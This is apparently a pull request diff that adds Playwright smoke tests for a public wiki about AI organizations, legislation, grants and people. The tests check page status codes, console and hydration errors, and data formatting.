### PR TITLE
fix: scanner-results review fixes (bigint coercion, unique constraint, bigserial)

### DIFF
--- a/apps/web/e2e/production-release-verification.spec.ts
+++ b/apps/web/e2e/production-release-verification.spec.ts
@@ -1,0 +1,621 @@
+import { test, expect, type Page } from "@playwright/test";
+
+/**
+ * Production Release Verification — Post-deploy smoke tests
+ *
+ * Targets https://www.longtermwiki.com to verify critical features
+ * from the ~95 PR release are working correctly.
+ *
+ * Run: PLAYWRIGHT_BASE_URL=https://www.longtermwiki.com npx playwright test e2e/production-release-verification.spec.ts --project=chromium
+ */
+
+// ─── Helpers ────────────────────────────────────────────────────────────────
+
+/** Collect console errors during a page visit, filtering non-app noise. */
+function setupErrorCollector(page: Page) {
+  const consoleErrors: string[] = [];
+  const pageErrors: string[] = [];
+  page.on("console", (msg) => {
+    if (msg.type() === "error") consoleErrors.push(msg.text());
+  });
+  page.on("pageerror", (err) => pageErrors.push(err.message));
+  return { consoleErrors, pageErrors };
+}
+
+/** Filter out benign console errors (favicon, analytics, etc). */
+function filterBenignErrors(errors: string[]): string[] {
+  return errors.filter(
+    (e) =>
+      !e.includes("favicon") &&
+      !e.includes("analytics") &&
+      !e.includes("404 (Not Found)") &&
+      !e.includes("ERR_BLOCKED_BY_CLIENT") // ad blockers
+  );
+}
+
+// ─── 1. Homepage ────────────────────────────────────────────────────────────
+
+test.describe("1. Homepage", () => {
+  test("loads and returns 200 with site title", async ({ page }) => {
+    const { consoleErrors } = setupErrorCollector(page);
+    const response = await page.goto("/", { waitUntil: "networkidle" });
+    expect(response?.status()).toBe(200);
+    await expect(page.locator("header")).toContainText("Longterm Wiki");
+    const appErrors = filterBenignErrors(consoleErrors);
+    expect(appErrors, `Console errors on homepage: ${appErrors.join(", ")}`).toHaveLength(0);
+  });
+});
+
+// ─── 2. Organization pages ─────────────────────────────────────────────────
+
+test.describe("2. Organization pages", () => {
+  test("/organizations/anthropic loads with content", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/organizations/anthropic", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    expect(response?.status()).toBe(200);
+
+    const h1 = page.locator("h1").first();
+    await expect(h1).toBeVisible({ timeout: 10000 });
+    const h1Text = await h1.textContent();
+    expect(h1Text?.toLowerCase()).toContain("anthropic");
+
+    // Should have substantial content
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText!.length).toBeGreaterThan(500);
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText).not.toContain("Unhandled Runtime Error");
+
+    expect(pageErrors, `JS errors on /organizations/anthropic`).toHaveLength(0);
+  });
+});
+
+// ─── 3. Verification dots ──────────────────────────────────────────────────
+
+test.describe("3. Verification dots", () => {
+  test("org pages show verification-related elements", async ({ page }) => {
+    await page.goto("/organizations/anthropic", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+
+    // Verification dots are rendered as small colored circles or icons
+    // near fact values. Look for any verification-related UI elements.
+    // They may appear as tooltips, badges, dots, or status indicators.
+    const bodyText = await page.locator("body").textContent();
+
+    // The page should have structured facts/data section
+    // Look for elements that indicate verification status
+    const verificationElements = page.locator(
+      '[class*="verif"], [data-verification], [title*="verif"], [aria-label*="verif"], [class*="dot"], [class*="status-dot"], svg circle'
+    );
+    const dotCount = await verificationElements.count();
+    console.log(`  Verification-related elements found: ${dotCount}`);
+
+    // Also check for fact values which would have verification dots
+    const factElements = page.locator('[class*="fact"], [data-fact], [class*="Fact"]');
+    const factCount = await factElements.count();
+    console.log(`  Fact-related elements found: ${factCount}`);
+
+    // At minimum, the page should render without errors
+    expect(bodyText).not.toContain("Application error");
+  });
+});
+
+// ─── 4. FactBase / FactsPanel ──────────────────────────────────────────────
+
+test.describe("4. FactBase / FactsPanel", () => {
+  test("/organizations/openai shows facts in multi-column layout", async ({
+    page,
+  }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/organizations/openai", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    expect(response?.status()).toBe(200);
+
+    // Wait for content to render
+    await page.waitForLoadState("networkidle");
+
+    // Look for the facts panel — it uses a multi-column grid layout
+    const factsPanel = page.locator(
+      '[class*="grid"], [class*="facts"], [class*="panel"], [class*="columns"]'
+    );
+    const panelCount = await factsPanel.count();
+    console.log(`  Grid/panel elements on OpenAI page: ${panelCount}`);
+    expect(panelCount).toBeGreaterThan(0);
+
+    // The page should have data-rich content (revenue, employees, etc.)
+    const bodyText = await page.locator("body").textContent();
+    // OpenAI page should mention key data points
+    const hasDataContent =
+      bodyText!.includes("revenue") ||
+      bodyText!.includes("Revenue") ||
+      bodyText!.includes("employees") ||
+      bodyText!.includes("Employees") ||
+      bodyText!.includes("Founded") ||
+      bodyText!.includes("founded") ||
+      bodyText!.includes("Valuation") ||
+      bodyText!.includes("valuation");
+    expect(hasDataContent, "OpenAI page should have structured data content").toBe(true);
+
+    expect(pageErrors, `JS errors on /organizations/openai`).toHaveLength(0);
+  });
+});
+
+// ─── 5. Legislation pages ──────────────────────────────────────────────────
+
+test.describe("5. Legislation pages", () => {
+  test("/legislation directory loads", async ({ page }) => {
+    const response = await page.goto("/legislation", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const h1 = page.locator("h1").first();
+    await expect(h1).toBeVisible({ timeout: 10000 });
+  });
+
+  test("/legislation/coe-ai-convention loads with stakeholder data", async ({
+    page,
+  }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/legislation/coe-ai-convention", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    // Legislation pages should show stakeholder-related content
+    const hasStakeholderContent =
+      bodyText!.includes("stakeholder") ||
+      bodyText!.includes("Stakeholder") ||
+      bodyText!.includes("signator") ||
+      bodyText!.includes("Signator") ||
+      bodyText!.includes("country") ||
+      bodyText!.includes("Country") ||
+      bodyText!.includes("provision") ||
+      bodyText!.includes("Provision") ||
+      bodyText!.includes("Council of Europe") ||
+      bodyText!.includes("convention");
+    expect(
+      hasStakeholderContent,
+      "Legislation page should have stakeholder/provision content"
+    ).toBe(true);
+
+    expect(pageErrors, `JS errors on legislation page`).toHaveLength(0);
+  });
+});
+
+// ─── 6. Source Checks dashboard ────────────────────────────────────────────
+
+test.describe("6. Source Checks", () => {
+  test("/source-checks dashboard loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/source-checks", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    // May redirect to a wiki entity page
+    expect([200, 307, 308]).toContain(response?.status());
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(100);
+  });
+});
+
+// ─── 7. People directory ───────────────────────────────────────────────────
+
+test.describe("7. People directory", () => {
+  test("/people loads with entries", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/people", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const h1 = page.locator("h1").first();
+    await expect(h1).toBeVisible({ timeout: 10000 });
+
+    // Should have people links
+    const personLinks = page.locator("a[href*='/people/']");
+    await expect(personLinks.first()).toBeVisible({ timeout: 15000 });
+    const count = await personLinks.count();
+    expect(count).toBeGreaterThan(5);
+    console.log(`  People directory entries: ${count}`);
+
+    expect(pageErrors, `JS errors on /people`).toHaveLength(0);
+  });
+});
+
+// ─── 8. AI Models directory ────────────────────────────────────────────────
+
+test.describe("8. AI Models directory", () => {
+  test("/ai-models loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/ai-models", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const h1 = page.locator("h1").first();
+    await expect(h1).toBeVisible({ timeout: 10000 });
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+
+    expect(pageErrors, `JS errors on /ai-models`).toHaveLength(0);
+  });
+});
+
+// ─── 9. Grants page ───────────────────────────────────────────────────────
+
+test.describe("9. Grants page", () => {
+  test("/grants loads with proper formatting (no $0 amounts)", async ({
+    page,
+  }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/grants", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    expect(response?.status()).toBe(200);
+
+    await page.waitForLoadState("networkidle");
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    // Check for proper dollar formatting — should have amounts like $1,000 or $1M
+    // but should NOT have a proliferation of "$0" as the dominant amount
+    const zeroAmountMatches = bodyText!.match(/\$0(?:\.\d+)?(?:\s|,|$)/g) || [];
+    const realAmountMatches =
+      bodyText!.match(/\$[\d,]+(?:\.\d+)?(?:[KMBkmb])?/g) || [];
+
+    console.log(
+      `  Grant amounts found: ${realAmountMatches.length} total, ${zeroAmountMatches.length} are $0`
+    );
+
+    // If there are grant amounts, $0 should not dominate
+    if (realAmountMatches.length > 5) {
+      const zeroRatio = zeroAmountMatches.length / realAmountMatches.length;
+      expect(
+        zeroRatio,
+        `Too many $0 amounts (${zeroAmountMatches.length}/${realAmountMatches.length})`
+      ).toBeLessThan(0.5);
+    }
+
+    expect(pageErrors, `JS errors on /grants`).toHaveLength(0);
+  });
+});
+
+// ─── 10. Investments page ──────────────────────────────────────────────────
+
+test.describe("10. Investments page", () => {
+  test("/investments loads and shows partial totals", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/investments", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    // Look for dollar amounts or total indicators
+    const hasDollarAmounts = /\$[\d,]+/.test(bodyText!);
+    const hasTotalIndicator =
+      bodyText!.includes("total") ||
+      bodyText!.includes("Total") ||
+      bodyText!.includes("partial") ||
+      bodyText!.includes("Partial") ||
+      bodyText!.includes("sum") ||
+      bodyText!.includes("Sum");
+    console.log(
+      `  Investments: dollar amounts=${hasDollarAmounts}, totals=${hasTotalIndicator}`
+    );
+
+    expect(pageErrors, `JS errors on /investments`).toHaveLength(0);
+  });
+});
+
+// ─── 11. Funding rounds ───────────────────────────────────────────────────
+
+test.describe("11. Funding rounds", () => {
+  test("/funding-rounds loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/funding-rounds", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    expect(pageErrors, `JS errors on /funding-rounds`).toHaveLength(0);
+  });
+});
+
+// ─── 12. Divisions page ───────────────────────────────────────────────────
+
+test.describe("12. Divisions page", () => {
+  test("/divisions loads with content", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/divisions", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    // Should have links to division entries
+    const divisionLinks = page.locator(
+      'a[href*="/divisions/"], table tbody tr, [role="row"]'
+    );
+    const count = await divisionLinks.count();
+    console.log(`  Division entries/rows: ${count}`);
+    expect(count).toBeGreaterThan(0);
+
+    expect(pageErrors, `JS errors on /divisions`).toHaveLength(0);
+  });
+});
+
+// ─── 13. Funding programs ──────────────────────────────────────────────────
+
+test.describe("13. Funding programs", () => {
+  test("/funding-programs loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/funding-programs", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    expect(pageErrors, `JS errors on /funding-programs`).toHaveLength(0);
+  });
+});
+
+// ─── 14. Publications ──────────────────────────────────────────────────────
+
+test.describe("14. Publications", () => {
+  test("/publications loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto("/publications", { timeout: 45000 });
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    expect(pageErrors, `JS errors on /publications`).toHaveLength(0);
+  });
+});
+
+// ─── 15. Source checks detail ──────────────────────────────────────────────
+
+test.describe("15. Source checks detail page", () => {
+  test("a specific source check fact page loads", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+
+    // Navigate to source-checks first to find a real fact link
+    await page.goto("/source-checks", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+
+    // Try to find a link to a specific fact check
+    const factLink = page.locator('a[href*="/source-checks/fact/"]').first();
+    const hasFactLink = (await factLink.count()) > 0;
+
+    if (hasFactLink) {
+      const href = await factLink.getAttribute("href");
+      console.log(`  Found source-check fact link: ${href}`);
+      const detailResponse = await page.goto(href!, {
+        waitUntil: "networkidle",
+        timeout: 45000,
+      });
+      expect(detailResponse?.status()).toBe(200);
+      const bodyText = await page.locator("body").textContent();
+      expect(bodyText).not.toContain("Application error");
+    } else {
+      // If no fact links on the page, try a known pattern
+      const detailResponse = await page.goto(
+        "/source-checks/fact/EF_ORG_0001_revenue_1",
+        { waitUntil: "networkidle", timeout: 45000 }
+      );
+      // May 404 if the specific ID doesn't exist — that's OK
+      const status = detailResponse?.status();
+      console.log(`  Direct fact page status: ${status}`);
+      expect([200, 404]).toContain(status);
+      if (status === 200) {
+        const bodyText = await page.locator("body").textContent();
+        expect(bodyText).not.toContain("Application error");
+      }
+    }
+  });
+});
+
+// ─── 16. No hydration errors ───────────────────────────────────────────────
+
+test.describe("16. No hydration errors on key pages", () => {
+  const HYDRATION_CHECK_PAGES = [
+    "/organizations/anthropic",
+    "/organizations/openai",
+    "/grants",
+    "/people",
+    "/legislation",
+  ];
+
+  for (const path of HYDRATION_CHECK_PAGES) {
+    test(`${path} has no hydration errors`, async ({ page }) => {
+      const hydrationErrors: string[] = [];
+      const allConsoleErrors: string[] = [];
+
+      page.on("console", (msg) => {
+        const text = msg.text();
+        if (msg.type() === "error") {
+          allConsoleErrors.push(text);
+          // Detect hydration errors — Next.js and React patterns
+          if (
+            text.includes("Hydration") ||
+            text.includes("hydration") ||
+            text.includes("did not match") ||
+            text.includes("server-rendered") ||
+            text.includes("Text content does not match") ||
+            text.includes("Expected server HTML") ||
+            text.includes("Minified React error #418") ||
+            text.includes("Minified React error #423") ||
+            text.includes("Minified React error #425")
+          ) {
+            hydrationErrors.push(text);
+          }
+        }
+      });
+
+      await page.goto(path, { waitUntil: "networkidle", timeout: 45000 });
+      await page.waitForTimeout(2000); // Extra time for hydration to complete
+
+      if (hydrationErrors.length > 0) {
+        console.log(`  HYDRATION ERRORS on ${path}:`);
+        hydrationErrors.forEach((e) =>
+          console.log(`    - ${e.substring(0, 300)}`)
+        );
+      }
+
+      expect(
+        hydrationErrors,
+        `Hydration errors on ${path}: ${hydrationErrors.map((e) => e.substring(0, 100)).join("; ")}`
+      ).toHaveLength(0);
+    });
+  }
+});
+
+// ─── 17. Received grants with verification dots ────────────────────────────
+
+test.describe("17. Received grants with verification dots", () => {
+  test("/organizations/evidence-action?tab=funding shows funding data", async ({
+    page,
+  }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    const response = await page.goto(
+      "/organizations/evidence-action?tab=funding",
+      { waitUntil: "networkidle", timeout: 45000 }
+    );
+    // May redirect or the org may not exist with this exact slug
+    const status = response?.status();
+    console.log(`  evidence-action funding tab status: ${status}`);
+
+    if (status === 200) {
+      const bodyText = await page.locator("body").textContent();
+      expect(bodyText).not.toContain("Application error");
+
+      // Check for funding-related content
+      const hasFundingContent =
+        bodyText!.includes("grant") ||
+        bodyText!.includes("Grant") ||
+        bodyText!.includes("funding") ||
+        bodyText!.includes("Funding") ||
+        bodyText!.includes("$");
+      console.log(`  Funding content present: ${hasFundingContent}`);
+    } else {
+      // Try without the tab param — maybe the org exists but tabs work differently
+      const fallback = await page.goto("/organizations/evidence-action", {
+        waitUntil: "networkidle",
+        timeout: 45000,
+      });
+      console.log(`  Fallback to /organizations/evidence-action: ${fallback?.status()}`);
+      // Just verify no crash
+      if (fallback?.status() === 200) {
+        const bodyText = await page.locator("body").textContent();
+        expect(bodyText).not.toContain("Application error");
+      }
+    }
+  });
+});
+
+// ─── 18. Political data — no raw integers ──────────────────────────────────
+
+test.describe("18. Political data rendering", () => {
+  test("/legislation pages do not show raw integer IDs", async ({ page }) => {
+    const { pageErrors } = setupErrorCollector(page);
+    await page.goto("/legislation", {
+      waitUntil: "networkidle",
+      timeout: 45000,
+    });
+
+    // Click on the first legislation link to check a detail page
+    const legislationLink = page
+      .locator('a[href*="/legislation/"]')
+      .first();
+    const hasLink = (await legislationLink.count()) > 0;
+
+    if (hasLink) {
+      const href = await legislationLink.getAttribute("href");
+      console.log(`  Checking legislation detail page: ${href}`);
+      await page.goto(href!, {
+        waitUntil: "networkidle",
+        timeout: 45000,
+      });
+
+      const bodyText = await page.locator("body").textContent();
+      expect(bodyText).not.toContain("Application error");
+
+      // Check for raw large integers that indicate unformatted data
+      // (e.g., database IDs like 1234567890 appearing in the UI)
+      const rawIntegers =
+        bodyText!.match(/(?<![a-zA-Z_\/\-\.])\d{8,}(?![a-zA-Z_\/\-\.])/g) ||
+        [];
+      // Filter out dates and phone-like numbers
+      const suspiciousIntegers = rawIntegers.filter((n) => {
+        if (n.startsWith("0")) return false; // codes
+        if (n.length === 8 && /^20\d{6}$/.test(n)) return false; // dates
+        if (n.length <= 8) return false; // could be legitimate
+        return true;
+      });
+
+      if (suspiciousIntegers.length > 0) {
+        console.log(
+          `  WARNING: Possible raw integers: ${suspiciousIntegers.slice(0, 5).join(", ")}`
+        );
+      }
+
+      // Soft assertion — report but don't hard-fail on borderline cases
+      expect.soft(
+        suspiciousIntegers.length,
+        `Raw integers found on legislation page: ${suspiciousIntegers.slice(0, 3).join(", ")}`
+      ).toBeLessThan(3);
+    }
+
+    expect(pageErrors, `JS errors on legislation pages`).toHaveLength(0);
+  });
+});
+
+// ─── Bonus: Cross-cutting health checks ────────────────────────────────────
+
+test.describe("Cross-cutting: Critical pages return 200", () => {
+  const CRITICAL_PAGES = [
+    "/",
+    "/organizations",
+    "/people",
+    "/ai-models",
+    "/legislation",
+    "/grants",
+    "/investments",
+    "/funding-rounds",
+    "/divisions",
+    "/funding-programs",
+    "/publications",
+  ];
+
+  for (const path of CRITICAL_PAGES) {
+    test(`${path} returns 200`, async ({ page }) => {
+      const response = await page.goto(path, { timeout: 45000 });
+      expect(response?.status()).toBe(200);
+    });
+  }
+});

--- a/apps/web/e2e/verify-legislation.spec.ts
+++ b/apps/web/e2e/verify-legislation.spec.ts
@@ -5,14 +5,13 @@
  * against https://www.longtermwiki.com
  *
  * Run:
- *   cd /Users/ozziegooen/Documents/GitHub.nosync/lw/main && \
  *   PLAYWRIGHT_BASE_URL=https://www.longtermwiki.com \
- *   npx playwright test /tmp/verify-legislation.spec.ts --project=chromium --reporter=list
+ *   npx playwright test apps/web/e2e/verify-legislation.spec.ts --project=chromium --reporter=list
  */
 
 import { test, expect, type Page } from "@playwright/test";
 
-const BASE_URL = "https://www.longtermwiki.com";
+const BASE_URL = process.env.PLAYWRIGHT_BASE_URL || "https://www.longtermwiki.com";
 
 // ─── Helpers ────────────────────────────────────────────────────────────────
 

--- a/apps/web/e2e/verify-legislation.spec.ts
+++ b/apps/web/e2e/verify-legislation.spec.ts
@@ -1,0 +1,324 @@
+/**
+ * Legislation Features Verification — Production Smoke Tests
+ *
+ * Verifies legislation features from PRs #3701, #3716, #3773, #3679, #3646
+ * against https://www.longtermwiki.com
+ *
+ * Run:
+ *   cd /Users/ozziegooen/Documents/GitHub.nosync/lw/main && \
+ *   PLAYWRIGHT_BASE_URL=https://www.longtermwiki.com \
+ *   npx playwright test /tmp/verify-legislation.spec.ts --project=chromium --reporter=list
+ */
+
+import { test, expect, type Page } from "@playwright/test";
+
+const BASE_URL = "https://www.longtermwiki.com";
+
+// ─── Helpers ────────────────────────────────────────────────────────────────
+
+/** Navigate to a URL with networkidle and 30s timeout. */
+async function goto(page: Page, path: string) {
+  const url = path.startsWith("http") ? path : `${BASE_URL}${path}`;
+  const response = await page.goto(url, {
+    waitUntil: "networkidle",
+    timeout: 30_000,
+  });
+  return response;
+}
+
+/** Get visible text from main content area. */
+async function getMainText(page: Page): Promise<string> {
+  return page.evaluate(() => {
+    const el = document.querySelector("main") ?? document.body;
+    return (el as HTMLElement).innerText ?? "";
+  });
+}
+
+// ─── 1. /legislation directory loads with entries ────────────────────────────
+
+test("1. /legislation - directory loads with entries", async ({ page }) => {
+  const response = await goto(page, "/legislation");
+  expect(response?.status(), "/legislation should return 200").toBe(200);
+
+  // Should have a heading
+  const h1 = page.locator("h1").first();
+  await expect(h1).toBeVisible({ timeout: 15_000 });
+
+  // Should have links to legislation detail pages
+  const legislationLinks = page.locator('a[href*="/legislation/"]');
+  await expect(legislationLinks.first()).toBeVisible({ timeout: 15_000 });
+  const count = await legislationLinks.count();
+  console.log(`  /legislation: found ${count} entry links`);
+  expect(count, "Should have multiple legislation entries").toBeGreaterThan(3);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText).not.toContain("Unhandled Runtime Error");
+  expect(bodyText.length, "Page should have substantial content").toBeGreaterThan(200);
+});
+
+// ─── 2. /legislation/coe-ai-convention - stakeholder data ───────────────────
+
+test("2. /legislation/coe-ai-convention - shows stakeholder data", async ({ page }) => {
+  const response = await goto(page, "/legislation/coe-ai-convention");
+  expect(response?.status(), "/legislation/coe-ai-convention should return 200").toBe(200);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText.length).toBeGreaterThan(200);
+
+  // Should have stakeholder-related content
+  const hasStakeholderContent =
+    /stakeholder/i.test(bodyText) ||
+    /signator/i.test(bodyText) ||
+    /country/i.test(bodyText) ||
+    /member state/i.test(bodyText) ||
+    /provision/i.test(bodyText) ||
+    /council of europe/i.test(bodyText);
+
+  console.log(`  coe-ai-convention body length: ${bodyText.length}`);
+  console.log(`  Has stakeholder content: ${hasStakeholderContent}`);
+
+  expect(
+    hasStakeholderContent,
+    `Expected stakeholder/signatory/country/provision content on coe-ai-convention page. Body snippet: "${bodyText.slice(0, 300)}"`
+  ).toBe(true);
+
+  // Look for visual stakeholder section or table
+  const stakeholderSection = page.locator(
+    'table, [class*="stakeholder"], [class*="table"], section'
+  );
+  const sectionCount = await stakeholderSection.count();
+  console.log(`  Table/section elements: ${sectionCount}`);
+});
+
+// ─── 3. /legislation/un-ai-governance-resolution - shows stakeholders ────────
+
+test("3. /legislation/un-ai-governance-resolution - shows stakeholders", async ({ page }) => {
+  const response = await goto(page, "/legislation/un-ai-governance-resolution");
+  expect(response?.status(), "/legislation/un-ai-governance-resolution should return 200").toBe(200);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText.length).toBeGreaterThan(200);
+
+  const hasStakeholderContent =
+    /stakeholder/i.test(bodyText) ||
+    /signator/i.test(bodyText) ||
+    /country/i.test(bodyText) ||
+    /member/i.test(bodyText) ||
+    /provision/i.test(bodyText) ||
+    /united nations/i.test(bodyText) ||
+    /resolution/i.test(bodyText);
+
+  console.log(`  un-ai-governance-resolution body length: ${bodyText.length}`);
+  console.log(`  Has stakeholder/resolution content: ${hasStakeholderContent}`);
+
+  expect(
+    hasStakeholderContent,
+    `Expected stakeholder or resolution-related content. Body snippet: "${bodyText.slice(0, 300)}"`
+  ).toBe(true);
+});
+
+// ─── 4. /legislation/seoul-declaration - shows stakeholders ─────────────────
+
+test("4. /legislation/seoul-declaration - shows stakeholders", async ({ page }) => {
+  const response = await goto(page, "/legislation/seoul-declaration");
+  expect(response?.status(), "/legislation/seoul-declaration should return 200").toBe(200);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText.length).toBeGreaterThan(200);
+
+  const hasStakeholderContent =
+    /stakeholder/i.test(bodyText) ||
+    /signator/i.test(bodyText) ||
+    /country/i.test(bodyText) ||
+    /member/i.test(bodyText) ||
+    /provision/i.test(bodyText) ||
+    /seoul/i.test(bodyText) ||
+    /declaration/i.test(bodyText);
+
+  console.log(`  seoul-declaration body length: ${bodyText.length}`);
+  console.log(`  Has stakeholder/declaration content: ${hasStakeholderContent}`);
+
+  expect(
+    hasStakeholderContent,
+    `Expected stakeholder or declaration-related content. Body snippet: "${bodyText.slice(0, 300)}"`
+  ).toBe(true);
+});
+
+// ─── 5. /legislation/nist-ai-rmf - shows stakeholders ───────────────────────
+
+test("5. /legislation/nist-ai-rmf - shows stakeholders", async ({ page }) => {
+  const response = await goto(page, "/legislation/nist-ai-rmf");
+  expect(response?.status(), "/legislation/nist-ai-rmf should return 200").toBe(200);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText.length).toBeGreaterThan(200);
+
+  const hasStakeholderContent =
+    /stakeholder/i.test(bodyText) ||
+    /signator/i.test(bodyText) ||
+    /organization/i.test(bodyText) ||
+    /provision/i.test(bodyText) ||
+    /framework/i.test(bodyText) ||
+    /nist/i.test(bodyText);
+
+  console.log(`  nist-ai-rmf body length: ${bodyText.length}`);
+  console.log(`  Has stakeholder/framework content: ${hasStakeholderContent}`);
+
+  expect(
+    hasStakeholderContent,
+    `Expected stakeholder or NIST framework content. Body snippet: "${bodyText.slice(0, 300)}"`
+  ).toBe(true);
+});
+
+// ─── 6. /legislation/executive-order-14110 - redirect works ─────────────────
+
+test("6. /legislation/executive-order-14110 - redirect works", async ({ page }) => {
+  // This URL should redirect to /legislation/us-executive-order (permanent redirect)
+  const response = await goto(page, "/legislation/executive-order-14110");
+
+  const finalUrl = page.url();
+  console.log(`  Redirect: /legislation/executive-order-14110 → ${finalUrl}`);
+
+  // The final page should be valid (not a 404 or error)
+  expect(response?.status(), "Final page after redirect should return 200").toBe(200);
+
+  // Final URL should be the canonical us-executive-order page
+  expect(
+    finalUrl,
+    "Should redirect to /legislation/us-executive-order"
+  ).toContain("/legislation/us-executive-order");
+
+  // Page should render real content, not an error
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText).not.toContain("404");
+  expect(bodyText.length, "Redirected page should have substantial content").toBeGreaterThan(200);
+
+  console.log(`  Final URL: ${finalUrl}, body length: ${bodyText.length}`);
+});
+
+// ─── 7. /legislation/ai-lead-act - no raw integer IDs ───────────────────────
+
+test("7. /legislation/ai-lead-act - political data renders without raw integer IDs", async ({ page }) => {
+  const response = await goto(page, "/legislation/ai-lead-act");
+  expect(response?.status(), "/legislation/ai-lead-act should return 200").toBe(200);
+
+  const bodyText = await getMainText(page);
+  expect(bodyText).not.toContain("Application error");
+  expect(bodyText.length).toBeGreaterThan(200);
+
+  console.log(`  ai-lead-act body length: ${bodyText.length}`);
+
+  // Check for raw large integers that indicate unformatted database IDs
+  // e.g., 9-digit+ integers that look like DB IDs appearing in visible text
+  const rawIntegers = bodyText.match(
+    /(?<![a-zA-Z_\/\-\.\$%,])(\d{8,})(?![a-zA-Z_\/\-\.\$%,])/g
+  ) ?? [];
+
+  // Filter false positives: dates like 20240115, URLs with port numbers, etc.
+  const suspiciousIntegers = rawIntegers.filter((n) => {
+    if (n.startsWith("0")) return false; // zero-prefixed codes
+    if (/^20\d{6}$/.test(n)) return false; // YYYYMMDD dates
+    if (/^19\d{6}$/.test(n)) return false; // YYYYMMDD dates (1900s)
+    if (n.length <= 8) return false; // could be legitimate year-based refs
+    return true;
+  });
+
+  if (rawIntegers.length > 0) {
+    console.log(`  Raw integers found: ${rawIntegers.slice(0, 10).join(", ")}`);
+  }
+  if (suspiciousIntegers.length > 0) {
+    console.log(`  WARNING: Suspicious DB-like integers: ${suspiciousIntegers.slice(0, 5).join(", ")}`);
+  }
+
+  expect(
+    suspiciousIntegers.length,
+    `Found raw integer IDs that may be unresolved DB IDs: ${suspiciousIntegers.slice(0, 3).join(", ")}`
+  ).toBeLessThan(3);
+
+  // Also check for sid_ patterns (raw stableIds)
+  const sidMatches = bodyText.match(/\bsid_[A-Za-z0-9]{3,}\b/g) ?? [];
+  console.log(`  sid_ patterns found: ${sidMatches.length}`);
+  expect(
+    sidMatches.length,
+    `Raw sid_ IDs visible in page: ${sidMatches.slice(0, 3).join(", ")}`
+  ).toBe(0);
+});
+
+// ─── 8. Legislation pages link stakeholders to entity profiles ───────────────
+
+test.describe("8. Stakeholder entity profile links", () => {
+  const PAGES_WITH_STAKEHOLDERS = [
+    "/legislation/coe-ai-convention",
+    "/legislation/nist-ai-rmf",
+    "/legislation/un-ai-governance-resolution",
+    "/legislation/seoul-declaration",
+  ];
+
+  for (const path of PAGES_WITH_STAKEHOLDERS) {
+    test(`${path} - links stakeholders to entity profiles`, async ({ page }) => {
+      const response = await goto(page, path);
+      expect(response?.status(), `${path} should return 200`).toBe(200);
+
+      const bodyText = await getMainText(page);
+      expect(bodyText).not.toContain("Application error");
+
+      // Check for links to entity profiles (organizations, people directories)
+      // Stakeholders should link to /organizations/, /people/, or /wiki/ pages
+      const entityProfileLinks = page.locator(
